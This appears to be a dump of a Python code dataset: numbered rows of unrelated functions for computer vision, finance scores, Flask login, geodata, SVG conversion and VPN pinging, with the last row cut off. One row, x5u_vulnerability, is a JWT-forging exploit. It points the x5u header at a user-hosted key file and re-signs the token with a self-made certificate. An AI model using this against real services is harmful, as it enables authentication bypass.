content
stringlengths 22
815k
| id
int64 0
4.91M
|
---|---|
def poll_apple_subscription():
"""Poll Apple API to update AppleSubscription"""
# todo: only near the end of the subscription
for apple_sub in AppleSubscription.query.all():
user = apple_sub.user
verify_receipt(apple_sub.receipt_data, user, APPLE_API_SECRET)
verify_receipt(apple_sub.receipt_data, user, MACAPP_APPLE_API_SECRET)
LOG.d("Finish poll_apple_subscription")
| 5,700 |
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='Faster R-CNN demo')
parser.add_argument('im', help="Input image", default= '000456.jpg')
parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--cpu', dest='cpu_mode',
help='Use CPU mode (overrides --gpu)',
action='store_true')
parser.add_argument('--prototxt', dest='prototxt', help='Prototxt of Network')
parser.add_argument('--weights', dest='caffemodel', help='Weights of trained network')
parser.add_argument('--labels', dest='labels', help='file contain labels',
default=None)
parser.add_argument('--cf', dest='min_cf', help='cutoff confidence score',
default=0.8, type=float)
parser.add_argument('--output',
dest='destination',
help='Output location of image detections',
default=None
)
args = parser.parse_args()
return args
| 5,701 |
def login():
"""The screen to log the user into the system."""
# call create_all to create database tables if this is the first run
db.create_all()
# If there are no users, create a default admin and non-admin
if len(User.query.all()) == 0:
create_default_users()
# Redirect the user if already logged in
if current_user.is_authenticated:
# Send admins and non-admins to different pages
if current_user.admin:
return redirect(url_for('admin.admin_home'))
else:
return redirect(url_for('export.export_home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is None or not user.check_password(form.password.data):
flash("Invalid username or password")
return redirect(url_for('login.login'))
login_user(user)
current_app.logger.info(f"Logged in {user}")
# If the user was redirected here, send the user back to the original page
next_page = request.args.get('next')
if not next_page or url_parse(next_page).netloc != '':
# If no next page given, default to these pages
if user.admin:
next_page = url_for('admin.admin_home')
else:
next_page = url_for('export.export_home')
return redirect(next_page)
nav_bar_title = "Login"
return render_template('login/login.html', title='Sign in', form=form, nav_bar_title=nav_bar_title)
| 5,702 |
def freight_sep_2014():
"""Find the number of freight of the month"""
for i in fetch_data_2014():
if i[1] == "Freight" and i[4] == "September":
num_0 = i[6]
return int(num_0)
| 5,703 |
def convexhull(
input_path: Union[str, "os.PathLike[Any]"],
output_path: Union[str, "os.PathLike[Any]"],
input_layer: Optional[str] = None,
output_layer: Optional[str] = None,
columns: Optional[List[str]] = None,
explodecollections: bool = False,
nb_parallel: int = -1,
batchsize: int = -1,
force: bool = False,
):
"""
Applies a convexhull operation on the input file.
The result is written to the output file specified.
Args:
input_path (PathLike): the input file
output_path (PathLike): the file to write the result to
input_layer (str, optional): input layer name. Optional if the input
file only contains one layer.
output_layer (str, optional): input layer name. Optional if the input
file only contains one layer.
columns (List[str], optional): If not None, only output the columns
specified. Defaults to None.
explodecollections (bool, optional): True to output only simple geometries.
Defaults to False.
nb_parallel (int, optional): the number of parallel processes to use.
Defaults to -1: use all available processors.
batchsize (int, optional): indicative number of rows to process per
batch. A smaller batch size, possibly in combination with a
smaller nb_parallel, will reduce the memory usage.
Defaults to -1: (try to) determine optimal size automatically.
force (bool, optional): overwrite existing output file(s).
Defaults to False.
"""
logger.info(f"Start convexhull on {input_path}")
return _geoops_sql.convexhull(
input_path=Path(input_path),
output_path=Path(output_path),
input_layer=input_layer,
output_layer=output_layer,
columns=columns,
explodecollections=explodecollections,
nb_parallel=nb_parallel,
batchsize=batchsize,
force=force,
)
| 5,704 |
def piotroski_f(df_cy,df_py,df_py2):
"""function to calculate f score of each stock and output information as dataframe"""
f_score = {}
tickers = df_cy.columns
for ticker in tickers:
ROA_FS = int(df_cy.loc["NetIncome",ticker]/((df_cy.loc["TotAssets",ticker]+df_py.loc["TotAssets",ticker])/2) > 0)
CFO_FS = int(df_cy.loc["CashFlowOps",ticker] > 0)
ROA_D_FS = int(df_cy.loc["NetIncome",ticker]/(df_cy.loc["TotAssets",ticker]+df_py.loc["TotAssets",ticker])/2 > df_py.loc["NetIncome",ticker]/(df_py.loc["TotAssets",ticker]+df_py2.loc["TotAssets",ticker])/2)
CFO_ROA_FS = int(df_cy.loc["CashFlowOps",ticker]/df_cy.loc["TotAssets",ticker] > df_cy.loc["NetIncome",ticker]/((df_cy.loc["TotAssets",ticker]+df_py.loc["TotAssets",ticker])/2))
LTD_FS = int((df_cy.loc["LTDebt",ticker] + df_cy.loc["OtherLTDebt",ticker])<(df_py.loc["LTDebt",ticker] + df_py.loc["OtherLTDebt",ticker]))
CR_FS = int((df_cy.loc["CurrAssets",ticker]/df_cy.loc["CurrLiab",ticker])>(df_py.loc["CurrAssets",ticker]/df_py.loc["CurrLiab",ticker]))
DILUTION_FS = int(df_cy.loc["CommStock",ticker] <= df_py.loc["CommStock",ticker])
GM_FS = int((df_cy.loc["GrossProfit",ticker]/df_cy.loc["TotRevenue",ticker])>(df_py.loc["GrossProfit",ticker]/df_py.loc["TotRevenue",ticker]))
ATO_FS = int(df_cy.loc["TotRevenue",ticker]/((df_cy.loc["TotAssets",ticker]+df_py.loc["TotAssets",ticker])/2)>df_py.loc["TotRevenue",ticker]/((df_py.loc["TotAssets",ticker]+df_py2.loc["TotAssets",ticker])/2))
f_score[ticker] = [ROA_FS,CFO_FS,ROA_D_FS,CFO_ROA_FS,LTD_FS,CR_FS,DILUTION_FS,GM_FS,ATO_FS]
f_score_df = pd.DataFrame(f_score,index=["PosROA","PosCFO","ROAChange","Accruals","Leverage","Liquidity","Dilution","GM","ATO"])
return f_score_df
| 5,705 |
def evaluate_circuit(
instances: Dict[str, SType],
connections: Dict[str, str],
ports: Dict[str, str],
) -> SDict:
"""evaluate a circuit for the given sdicts."""
# it's actually easier working w reverse:
reversed_ports = {v: k for k, v in ports.items()}
block_diag = {}
for name, S in instances.items():
block_diag.update(
{(f"{name},{p1}", f"{name},{p2}"): v for (p1, p2), v in sdict(S).items()}
)
sorted_connections = sorted(connections.items(), key=_connections_sort_key)
all_connected_instances = {k: {k} for k in instances}
for k, l in sorted_connections:
name1, _ = k.split(",")
name2, _ = l.split(",")
connected_instances = (
all_connected_instances[name1] | all_connected_instances[name2]
)
for name in connected_instances:
all_connected_instances[name] = connected_instances
current_ports = tuple(
p
for instance in connected_instances
for p in set([p for p, _ in block_diag] + [p for _, p in block_diag])
if p.startswith(f"{instance},")
)
block_diag.update(_interconnect_ports(block_diag, current_ports, k, l))
for i, j in list(block_diag.keys()):
is_connected = i == k or i == l or j == k or j == l
is_in_output_ports = i in reversed_ports and j in reversed_ports
if is_connected and not is_in_output_ports:
del block_diag[i, j] # we're no longer interested in these port combinations
circuit_sdict: SDict = {
(reversed_ports[i], reversed_ports[j]): v
for (i, j), v in block_diag.items()
if i in reversed_ports and j in reversed_ports
}
return circuit_sdict
| 5,706 |
def main():
"""The function main() does the following:
1. Creates a grid
2. Test connectivity between the start and end points
3. If there is connectivity it finds and plots the found path
"""
grid = create_grid(DIMENSION, ALPHA)
grid_orig = []
grid_orig = copy.deepcopy(grid)
connected = True
if not search(0, 0, grid):
print("There is no solution")
connected = False
grid = grid_orig
if connected:
walls = get_walls(grid, DIMENSION)
print(walls)
start = (0, 0)
end = (DIMENSION-1, DIMENSION-1)
path = AStar()
path.init_grid(DIMENSION, DIMENSION, walls, start, end)
path.solve()
print(path.get_path())
moves = path.get_path()
for i in range(len(moves)):
grid[moves[i][0]][moves[i][1]] = 3
plot_function(grid, DIMENSION)
| 5,707 |
def canonical_smiles_from_smiles(smiles, sanitize = True):
"""
Apply canonicalisation with rdkit
Parameters
------------
smiles : str
sanitize : bool
Wether to apply rdkit sanitisation, default yes.
Returns
---------
canonical_smiles : str
Returns None if canonicalisation fails
"""
try:
mol = Chem.MolFromSmiles(smiles, sanitize = sanitize)
mol.UpdatePropertyCache()
#mol = Chem.AddHs(mol)
Chem.GetSSSR(mol)
return Chem.MolToSmiles(mol,canonical=True, allHsExplicit=True, kekuleSmiles = False, allBondsExplicit = True, isomericSmiles = True)
except:
return None
| 5,708 |
def get_ref(struct, ref, leaf=False):
"""
Figure out if a reference (e.g., "#/foo/bar") exists within a
given structure and return it.
"""
if not isinstance(struct, dict):
return None
parts = ref_parts(ref)
result = {}
result_current = result
struct_current = struct
for part in parts:
if part not in struct_current:
return None
result_current[part] = {}
result_current = result_current[part]
struct_current = struct_current[part]
if leaf:
return struct_current
result_current.update(struct_current)
return result
| 5,709 |
def delete_files(dpath: str, label: str='') -> str:
"""
Delete all files except the files that have names matched with label
If the directory path doesn't exist return 'The path doesn't exist'
else return the string with the count of all files in the directory
and the count of deleted files.
Args:
dpath
Type: string
Description: Directory path
label
Type: string
Description: Store characters or name that could be matched with
name of files in the directory. If match are true
the file will not be deleted.
Returns:
Type: string
Description: The 'The path doesn't exist' string
or the string with the count of all files in the directory
and the count of deleted files.
"""
directory = os.path.abspath(dpath)
print(directory)
# Test whether the path exists
if not os.path.exists(dpath):
return "The path doesn't exist"
else:
# Make list of files
files = os.listdir(directory)
all_files_count = len(files)
delete_files_count = 0
for file in files:
if file.find(label) == -1:
os.remove(directory + "\\" + file)
delete_files_count += 1
return "All files: {} Delete files: {}".format(all_files_count, delete_files_count)
| 5,710 |
def start():
"""This function initializes and saves the needed variables"""
start.nameList = [] # List to save the different names of the locators (their numbers)
start.locList = [] # List to save a reference to the locators themselves
start.locPosList = [] # List to save each of the position of the locators
start.jointList = [] # List to save a reference to each joint
start.armsValue = 1 # Number of arms selected by the user
| 5,711 |
def edit_maker_app(
operator,
app_maker_code,
app_name="",
app_url="",
developer="",
app_tag="",
introduction="",
add_user="",
company_code="",
):
"""
@summary: 修改 maker app
@param operator:操作者英文id
@param app_maker_code: maker app编码
@param app_name:app名称,可选参数,为空则不修改名称
@param app_url:app链接,可选参数,为空则不修改链接
@param developer: 填写开发者英文id列表,请用英文分号";"隔开, 可选参数,为空则不修改开发者
需传入修改后的所有开发者信息
@param app_tag: 可选 String 轻应用分类
@param introduction: 可选 String 轻应用描述
@param add_user: 冗余字段,多版本兼容
@param company_code: 冗余字段,多版本兼容
@return: {'result': True, 'message':u"APP Maker 修改成功"}
{'result': False, 'message':u"APP Maker 修改出错"}
"""
data = {
"bk_app_code": settings.APP_CODE,
"bk_app_secret": settings.SECRET_KEY,
"light_app_code": app_maker_code,
"app_name": app_name,
}
if app_url:
data["app_url"] = app_url
if developer:
data["developers"] = developer.split(",")
if app_tag:
data["app_tag"] = app_tag
if introduction:
data["introduction"] = introduction
resp = _request_paasv3_light_app_api(url=LIGHT_APP_API, method="patch", data=data)
return resp
| 5,712 |
def fifo():
"""
Returns a callable instance of the first-in-first-out (FIFO) prioritization
algorithm that sorts ASDPs by timestamp
Returns
-------
prioritize: callable
a function that takes an ASDP type name and a dict of per-type ASDPDB
metadata, as returned by `asdpdb.load_asdp_metadata_by_type`, and
returns a list of dicts containing ordered ASDPs with metadata (in the
format expected by `asdpdb.save_asdp_ordering`)
"""
def prioritize(asdp_type, metadata):
# Extract metadata entries
ids = metadata['asdp_id']
sue = metadata['sue']
ts = metadata['timestamp']
untransmitted = metadata['downlink_status']
n_untransmitted = np.sum(untransmitted)
if n_untransmitted == 0:
logger.info(f'No untransmitted {asdp_type} products to prioritize')
return []
size_bytes = metadata['asdp_size_bytes']
sue_per_byte = sue / size_bytes
# Fill in bad values with zeros
sue_per_byte[np.isnan(sue_per_byte)] = 0.0
sue_per_byte[np.isinf(sue_per_byte)] = 0.0
order = np.argsort(ts)
for cand_id in order:
if untransmitted[cand_id]:
logger.info(
f'Selected ASDP {ids[cand_id]}, '
f'initial SUE = {sue_per_byte[cand_id]:.2e}'
)
products = [
{
'asdp_id': ids[cand_id],
'initial_sue': sue[cand_id],
'final_sue': sue[cand_id],
'initial_sue_per_byte': sue_per_byte[cand_id],
'final_sue_per_byte': sue_per_byte[cand_id],
'size_bytes': size_bytes[cand_id],
'timestamp': ts[cand_id],
}
for cand_id in order
if untransmitted[cand_id]
]
return products
return prioritize
| 5,713 |
def super(d, t):
"""Pressure p and internal energy u of supercritical water/steam
as a function of density d and temperature t (deg C)."""
tk = t + tc_k
tau = tstar3 / tk
delta = d / dstar3
taupow = power_array(tau, tc3)
delpow = power_array(delta, dc3)
phidelta = nr3[0] * delpow[-1] + sum([n * i * delpow[i - 1] * taupow[j] for
(i, j, n) in zip(ir3, jr3, nr3)])
phitau = sum([n * delpow[i] * j * taupow[j - 1] for
(i, j, n) in zip(ir3, jr3, nr3)])
rt = rconst * tk
p = d * rt * delta * phidelta
u = rt * tau * phitau
return (p, u)
| 5,714 |
def ls(query=None, quiet=False):
"""List and count files matching the query and compute total file size.
Parameters
----------
query : dict, optional
(default: None)
quiet : bool, optional
Whether to suppress console output.
"""
tty.screen.status('Searching ...', mode='static')
if query is None:
query = CONFIG['GENERAL']['QUERY']
file_list = scihub.search(query, verbose=True)
size = 0.0
for f in file_list:
size += f['size']
if not quiet:
msg = 'Found {0:d} files ({1}).'.format(len(file_list),
utils.b2h(size))
logging.info(msg)
tty.screen.result(msg)
for f in file_list:
msg = '{:>8} {}'.format(utils.b2h(f['size']), f['filename'])
# tty.update(f['filename'],msg)
logging.info(f['filename'])
#
# Write file_list to JSON file
# so it can be read later by the get() and store() commands.
#
if 'OUT_FILE' in CONFIG['GENERAL'] and \
CONFIG['GENERAL']['OUT_FILE'] is not None:
with open(CONFIG['GENERAL']['OUT_FILE'], 'w') as f:
json.dump(file_list, f, default=str, indent=2)
return file_list
| 5,715 |
def test_count_with_skip(service):
"""Check getting $count with $skip"""
# pylint: disable=redefined-outer-name
responses.add(
responses.GET,
f"{service.url}/Employees/$count?$skip=12",
json=11,
status=200)
request = service.entity_sets.Employees.get_entities().skip(12).count()
assert isinstance(request, pyodata.v2.service.GetEntitySetRequest)
assert request.execute() == 11
| 5,716 |
def _create_full_gp_model():
"""
GP Regression
"""
full_gp_model = gpflow.models.GPR(
(Datum.X, Datum.Y),
kernel=gpflow.kernels.SquaredExponential(),
mean_function=gpflow.mean_functions.Constant(),
)
opt = gpflow.optimizers.Scipy()
opt.minimize(
full_gp_model.training_loss,
variables=full_gp_model.trainable_variables,
options=dict(maxiter=300),
)
return full_gp_model
| 5,717 |
def prime_factors(n, multiplicities=False):
"""
Generates the distinct prime factors of a positive integer n in an
ordered sequence. If the 'multiplicities' option is True then it
generates pairs of prime factors of n and their multiplicities
(largest exponent e such that p^e divides n for a prime factor p),
e.g. for n = 54 = 2^1 x 3^3 we have
54 -> 2, 3
54, multiplicities=True -> (2, 1), (3, 3)
This is precisely the prime factorisation of n.
"""
if n == 1:
return
if is_prime(n):
if not multiplicities:
yield n
else:
yield n, 1
return
i = 0
d = 2
ub = math.ceil(n / 2) + 1
while d <= ub:
q = n / d
if q.is_integer() and is_prime(d):
if i == 1:
ub = min(ub, q)
if not multiplicities:
yield d
else:
m = max(e for e in reversed(range(1, math.ceil(math.log(n, d)))) if n % (d**e) == 0)
yield d, m
i += 1
d += 1
| 5,718 |
def read_file_header(fd, endian):
"""Read mat 5 file header of the file fd.
Returns a dict with header values.
"""
fields = [
('description', 's', 116),
('subsystem_offset', 's', 8),
('version', 'H', 2),
('endian_test', 's', 2)
]
hdict = {}
for name, fmt, num_bytes in fields:
data = fd.read(num_bytes)
hdict[name] = unpack(endian, fmt, data)
hdict['description'] = hdict['description'].strip()
v_major = hdict['version'] >> 8
v_minor = hdict['version'] & 0xFF
hdict['__version__'] = '%d.%d' % (v_major, v_minor)
return hdict
| 5,719 |
def shape_padleft(t, n_ones=1):
"""Reshape `t` by left-padding the shape with `n_ones` 1s.
See Also
--------
shape_padaxis
shape_padright
Dimshuffle
"""
_t = aet.as_tensor_variable(t)
pattern = ["x"] * n_ones + [i for i in range(_t.type.ndim)]
return _t.dimshuffle(pattern)
| 5,720 |
def zad1(x):
"""
Функция выбирает все элементы, идущие за нулём.
Если таких нет, возвращает None.
Если такие есть, то возвращает их максимум.
"""
zeros = (x[:-1] == 0)
if np.sum(zeros):
elements_to_compare = x[1:][zeros]
return np.max(elements_to_compare)
return None
| 5,721 |
def skopt_space(hyper_to_opt):
"""Create space of hyperparameters for the gaussian processes optimizer.
This function creates the space of hyperparameter following skopt syntax.
Parameters:
hyper_to_opt (dict): dictionary containing the configuration of the
hyperparameters to optimize. This dictionary must follow the next
syntax:
.. code:: python
hyper_to_opt = {'hyperparam_1': {'type': ...,
'range: ...,
'step': ...},
'hyperparam_2': {'type': ...,
'range: ...,
'step': ...},
...
}
See the oficial documentation for more details.
Returns:
list: space of hyperparameters following the syntax required by the
gaussian processes optimization algorithm.
Example::
hyper_top_opt = {
'cnn_rnn_dropout':{
'type': 'uniform',
'range': [0,1]},
'optimizer_type':{
'type': 'choice',,
'range': ['Adadelta', 'Adam', 'RMSProp', 'SGD']},
'base_learning_rate':{
'type': 'loguniform',
'range': [-5, 0]},
'layer1_filters':{
'type': 'quniform',
'range': [16, 64],
'step': 1}}
Raises:
KeyError: if ``type`` is other than ``uniform``, ``quniform``,
``loguniform`` or ``choice``.
"""
space = []
# loop over the hyperparameters to optimize dictionary and add each
# hyperparameter to the space
for key, items in hyper_to_opt.items():
if items['type'] == 'uniform':
space.append(skopt.space.Real(items['range'][0],
items['range'][1],
name=key))
elif items['type'] == 'quniform':
space.append(skopt.space.Integer(items['range'][0],
items['range'][1],
name=key))
elif items['type'] == 'loguniform':
space.append(skopt.space.Real(items['range'][0],
items['range'][1],
name=key,
prior='log-uniform'))
elif items['type'] == 'choice':
space.append(skopt.space.Categorical(items['range'],
name=key))
else:
raise KeyError('The gaussian processes optimizer supports only \
uniform, quniform, loguniform and choice space types')
return space
| 5,722 |
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a R2CNN network')
parser.add_argument('--img_dir', dest='img_dir',
help='images path',
default='/mnt/USBB/gx/DOTA/DOTA_clip/val/images/', type=str)
parser.add_argument('--image_ext', dest='image_ext',
help='image format',
default='.png', type=str)
parser.add_argument('--test_annotation_path', dest='test_annotation_path',
help='test annotate path',
default=cfgs.TEST_ANNOTATION_PATH, type=str)
parser.add_argument('--gpu', dest='gpu',
help='gpu index',
default='0', type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
| 5,723 |
def process_text_embedding(text_match, text_diff):
"""
Process text embedding based on embedding type during training and evaluation
Args:
text_match (List[str]/Tensor): For matching caption, list of captions for USE embedding and Tensor for glove/fasttext embeddings
text_diff (List[str]/Tensor): For non-matching caption, list of captions for USE embedding and Tensor for glove/fasttext embeddings
Returns:
text_match (Tensor): Processed text-embedding for matching caption
text_diff (Tensor): Processed text-embedding for non-matching caption
"""
if embed_type == 'use':
text_match = torch.tensor(use_embed(text_match).numpy())
text_diff = torch.tensor(use_embed(text_diff).numpy())
text_match = text_match.to(device)
text_diff = text_diff.to(device)
return text_match, text_diff
| 5,724 |
def compress_image(filename):
"""
Function to resize(compress) image to a given size
:param filename: Image to resize
:return: None
"""
from PIL import Image # library for compressing images
# open file to be compressed
img = Image.open(filename)
# compress the image accordingly
foo = img.resize((200, 200), Image.ANTIALIAS)
# save the downsized image
foo.save(filename, optimize=True, quality=100)
| 5,725 |
def x5u_vulnerability(jwt=None, url=None, crt=None, pem=None, file=None):
"""
Check jku Vulnerability.
Parameters
----------
jwt: str
your jwt.
url: str
your url.
crt: str
crt path file
pem: str
pem file name
file: str
jwks file name
Returns
-------
str
your new jwt.
"""
if not is_valid_jwt(jwt):
raise InvalidJWT("Invalid JWT format")
if file is None:
file = "jwks_with_x5c.json"
jwt_json = jwt_to_json(jwt)
if "x5u" not in jwt_json[HEADER]:
raise InvalidJWT("Invalid JWT format JKU missing")
if crt is None or pem is None:
crt, pem = create_crt()
with open(crt) as f:
content = f.read()
f.close()
x5u = requests.get(jwt_json[HEADER]["x5u"]).json()
x5u["keys"][0]["x5c"] = (
content.replace("-----END CERTIFICATE-----", "")
.replace("-----BEGIN CERTIFICATE-----", "")
.replace("\n", "")
)
if ".json" not in file:
file += ".json"
if not url.endswith("/"):
url += "/"
jwt_json[HEADER]["x5u"] = f"{url}{file}"
f = open(file, "w")
f.write(json.dumps(x5u))
f.close()
s = encode_jwt(jwt_json)
key = crypto.load_privatekey(crypto.FILETYPE_PEM, open(pem).read())
priv = key.to_cryptography_key()
sign = priv.sign(
bytes(s, encoding="UTF-8"),
algorithm=hashes.SHA256(),
padding=padding.PKCS1v15(),
)
return s + "." + base64.urlsafe_b64encode(sign).decode("UTF-8").rstrip("=")
| 5,726 |
def test_failing_build_cmd(env: LlvmEnv, tmpdir):
"""Test that reset() raises an error if build command fails."""
(Path(tmpdir) / "program.c").touch()
benchmark = env.make_benchmark(Path(tmpdir) / "program.c")
benchmark.proto.dynamic_config.build_cmd.argument.extend(
["$CC", "$IN", "-invalid-cc-argument"]
)
benchmark.proto.dynamic_config.build_cmd.timeout_seconds = 10
with pytest.raises(
BenchmarkInitError,
match=r"clang: error: unknown argument: '-invalid-cc-argument'",
):
env.reset(benchmark=benchmark)
| 5,727 |
def from_kitti(
data_dir: str,
data_type: str,
) -> List[Frame]:
"""Function converting kitti data to Scalabel format."""
if data_type == "detection":
return from_kitti_det(data_dir, data_type)
frames = []
img_dir = osp.join(data_dir, "image_02")
label_dir = osp.join(data_dir, "label_02")
cali_dir = osp.join(data_dir, "calib")
oxt_dir = osp.join(data_dir, "oxts")
assert osp.exists(img_dir), f"Folder {img_dir} is not found"
vid_names = sorted(os.listdir(img_dir))
global_track_id = 0
for vid_name in vid_names:
trackid_maps: Dict[str, int] = {}
img_names = sorted(
[
f.path
for f in os.scandir(osp.join(img_dir, vid_name))
if f.is_file() and f.name.endswith("png")
]
)
projection = read_calib(cali_dir, int(vid_name))
if osp.exists(label_dir):
label_file = osp.join(label_dir, f"{vid_name}.txt")
labels_dict, trackid_maps, global_track_id = parse_label(
data_type, label_file, trackid_maps, global_track_id
)
for fr, img_name in enumerate(sorted(img_names)):
with Image.open(img_name) as img:
width, height = img.size
image_size = ImageSize(height=height, width=width)
fields = read_oxts(oxt_dir, int(vid_name))
poses = [KittiPoseParser(fields[i]) for i in range(len(fields))]
rotation = tuple(
R.from_matrix(poses[fr].rotation).as_euler("xyz").tolist()
)
position = tuple(
np.array(poses[fr].position - poses[0].position).tolist()
)
cam2global = Extrinsics(location=position, rotation=rotation)
intrinsics = Intrinsics(
focal=(projection[0][0], projection[1][1]),
center=(projection[0][2], projection[1][2]),
)
if osp.exists(label_dir):
if not fr in labels_dict:
labels = []
else:
labels = labels_dict[fr]
else:
labels = []
img_name = data_type + img_name.split(data_type)[-1]
video_name = "/".join(img_name.split("/")[:-1])
f = Frame(
name=img_name.split("/")[-1],
videoName=video_name,
frameIndex=fr,
size=image_size,
extrinsics=cam2global,
intrinsics=intrinsics,
labels=labels,
)
frames.append(f)
return frames
| 5,728 |
def get_all_interactions(L, index_1=False):
"""
Returns a list of all epistatic interactions for a given sequence length.
This sets of the order used for beta coefficients throughout the code.
If index_1=True, then returns epistatic interactions corresponding to
1-indexing.
"""
if index_1:
pos = range(1, L+1)
else:
pos = range(L)
all_U = list(powerset(pos))
return all_U
| 5,729 |
def convertSVG(streamOrPath, name, defaultFont):
"""
Loads an SVG and converts it to a DeepSea vector image FlatBuffer format.
streamOrPath: the stream or path for the SVG file.
name: the name of the vector image used to decorate material names.
defaultFont: the default font to use.
The binary data is returned.
"""
svg = minidom.parse(streamOrPath)
materials = Materials(name)
commands = []
for rootNode in svg.childNodes:
if rootNode.nodeType != xml.dom.Node.ELEMENT_NODE:
continue
if rootNode.tagName == 'svg':
if rootNode.hasAttribute('viewBox'):
box = rootNode.getAttribute('viewBox').split()
if len(box) != 4:
raise Exception("Invalid view box '" + rootNode.getAttribute('viewbox') + "'")
if sizeFromString(box[0], 0.0) != 0.0 or sizeFromString(box[1], 0.0) != 0.0:
raise Exception("View box must have an origin of (0, 0)")
size = (sizeFromString(box[2], 0.0), sizeFromString(box[3], 0.0))
elif rootNode.hasAttribute('width') and rootNode.hasAttribute('height'):
size = (sizeFromString(rootNode.getAttribute('width'), 0.0),
sizeFromString(rootNode.getAttribute('height'), 0.0))
else:
raise Exception("No size set on SVG.")
diagonalSize = math.sqrt(size[0]*size[0] + size[1]*size[1])/math.sqrt(2)
for node in rootNode.childNodes:
if node.nodeType != xml.dom.Node.ELEMENT_NODE:
continue
if node.tagName == 'defs':
readMaterials(node, materials, size, diagonalSize)
else:
commands.extend(readShapes(node, defaultFont, materials, size, diagonalSize, \
Transform()))
break
builder = flatbuffers.Builder(0)
materials.write(builder)
commandOffsets = []
for command in commands:
commandOffsets.extend(command(builder))
VectorImage.StartCommandsVector(builder, len(commandOffsets))
for offset in reversed(commandOffsets):
builder.PrependUOffsetTRelative(offset)
commandsOffset = builder.EndVector()
VectorImage.Start(builder)
materials.writeToVectorImage(builder)
VectorImage.AddCommands(builder, commandsOffset)
VectorImage.AddSize(builder, CreateVector2f(builder, size[0], size[1]))
builder.Finish(VectorImage.End(builder))
return builder.Output()
| 5,730 |
def to_accumulo(df, config: dict, meta: dict, compute=True, scheduler=None):
"""
Paralell write of Dask DataFrame to Accumulo Table
Parameters
----------
df : Dataframe
The dask.Dataframe to write to Accumulo
config : dict
Accumulo configuration to use to connect to accumulo
meta : dict
Data model to apply to dataframe
compute : bool
Should compute be called; immediately call write if True, delayed otherwise
scheduler : str
The scheduler to use, like “threads” or “processes”
Returns
-------
The number of Accumulo rows written if they were computed right away.
If not, the delayed tasks associated with the writing of the table
"""
dfs = df.to_delayed()
values = [delayed(pandas_write_dataframe)(config, d, meta) for d in dfs]
if compute:
return sum(delayed(values).compute(scheduler=scheduler))
else:
return values
| 5,731 |
def compute_euclidean_distance(x, y):
"""
Computes the euclidean distance between two tensorflow variables
"""
d = tf.reduce_sum(tf.square(x-y),axis=1,keep_dims=True)
return d
| 5,732 |
def vpn_ping(address, port, timeout=0.05, session_id=None):
"""Sends a vpn negotiation packet and returns the server session.
Returns False on a failure. Basic packet structure is below.
Client packet (14 bytes)::
0 1 8 9 13
+-+--------+-----+
|x| cli_id |?????|
+-+--------+-----+
x = packet identifier 0x38
cli_id = 64 bit identifier
? = unknown, probably flags/padding
Server packet (26 bytes)::
0 1 8 9 13 14 21 2225
+-+--------+-----+--------+----+
|x| srv_id |?????| cli_id |????|
+-+--------+-----+--------+----+
x = packet identifier 0x40
cli_id = 64 bit identifier
? = unknown, probably flags/padding
bit 9 was 1 and the rest were 0 in testing
"""
if session_id is None:
session_id = random.randint(0, 0xffffffffffffffff)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = struct.pack("!BQxxxxxx", 0x38, session_id)
sock.sendto(data, (address, port))
sock.settimeout(timeout)
try:
received = sock.recv(2048)
except socket.timeout:
return False
finally:
sock.close()
fmt = "!BQxxxxxQxxxx"
if len(received) != struct.calcsize(fmt):
print struct.calcsize(fmt)
return False
(identifier, server_sess, client_sess) = struct.unpack(fmt, received)
if identifier == 0x40 and client_sess == session_id:
return server_sess
| 5,733 |
def setup_logging( default_path='logging.json',
level = None,
env_key='LOG_CFG' ):
"""
Setup logging configuration
"""
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
if level:
config['root']['level'] = level
logging.config.dictConfig(config)
| 5,734 |
def is_admin():
"""Checks if author is a server administrator, or has the correct permission tags."""
async def predicate(ctx):
return (
# User is a server administrator.
ctx.message.channel.permissions_for(ctx.message.author).administrator
# User is a developer.
or (ctx.author.id == developer_id)
# User has a permission tag.
or (discord.utils.get(ctx.author.roles, name=str(f"fox:{ctx.command.name}")))
)
return commands.check(predicate)
| 5,735 |
def send_message(chat_id):
"""Send a message to a chat
If a media file is found, send_media is called, else a simple text message
is sent
"""
files = request.files
if files:
res = send_media(chat_id, request)
else:
message = request.form.get("message", default="Empty Message")
res = g.driver.chat_send_message(chat_id, message)
if res:
return jsonify(res)
else:
return False
| 5,736 |
def get_neighbours(sudoku, row, col):
"""Funkcja zwraca 3 listy sasiadow danego pola, czyli np. wiersz tego pola, ale bez samego pola"""
row_neighbours = [sudoku[row][y] for y in range(9) if y != col]
col_neighbours = [sudoku[x][col] for x in range(9) if x != row]
sqr_neighbours = [sudoku[x][y] for x in range(9) if x//3 == row//3 for y in range(9) if y//3 == col//3 if x!=row or y!=col]
return row_neighbours, col_neighbours, sqr_neighbours
| 5,737 |
def to_ndarray(image):
"""
Convert torch.Tensor or PIL.Image.Image to ndarray.
:param image: (torch.Tensor or PIL.Image.Image) image to convert to ndarray
:rtype (ndarray): image as ndarray
"""
if isinstance(image, torch.Tensor):
return image.numpy()
if isinstance(image, PIL.Image.Image):
return np.array(image)
raise TypeError("to_ndarray: expect torch.Tensor or PIL.Image.Image")
| 5,738 |
def make_map_exposure_true_energy(pointing, livetime, aeff, ref_geom, offset_max):
"""Compute exposure WcsNDMap in true energy (i.e. not convolved by Edisp).
Parameters
----------
pointing : `~astropy.coordinates.SkyCoord`
Pointing direction
livetime : `~astropy.units.Quantity`
Livetime
aeff : `~gammapy.irf.EffectiveAreaTable2D`
Effective area table
ref_geom : `~gammapy.maps.WcsGeom`
Reference WcsGeom object used to define geometry (space - energy)
offset_max : `~astropy.coordinates.Angle`
Maximum field of view offset.
Returns
-------
expmap : `~gammapy.maps.WcsNDMap`
Exposure cube (3D) in true energy bins
"""
offset = make_separation_map(ref_geom, pointing).quantity
# Retrieve energies from WcsNDMap
# Note this would require a log_center from the geometry
# Or even better edges, but WcsNDmap does not really allows it.
energy = ref_geom.axes[0].center * ref_geom.axes[0].unit
exposure = aeff.data.evaluate(offset=offset, energy=energy)
exposure *= livetime
# We check if exposure is a 3D array in case there is a single bin in energy
